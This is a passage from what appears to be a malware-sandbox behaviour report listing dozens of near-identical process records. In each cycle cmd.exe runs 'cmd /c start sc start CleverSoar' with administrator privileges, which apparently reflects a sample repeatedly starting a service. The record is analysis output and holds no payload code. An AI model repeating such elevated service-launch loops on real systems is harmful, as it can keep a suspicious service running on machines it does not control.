                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:66
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:74
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:88
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff72bec0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:89
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:90
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:91
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:92
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:93
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:94
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:95
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:96
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:97
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
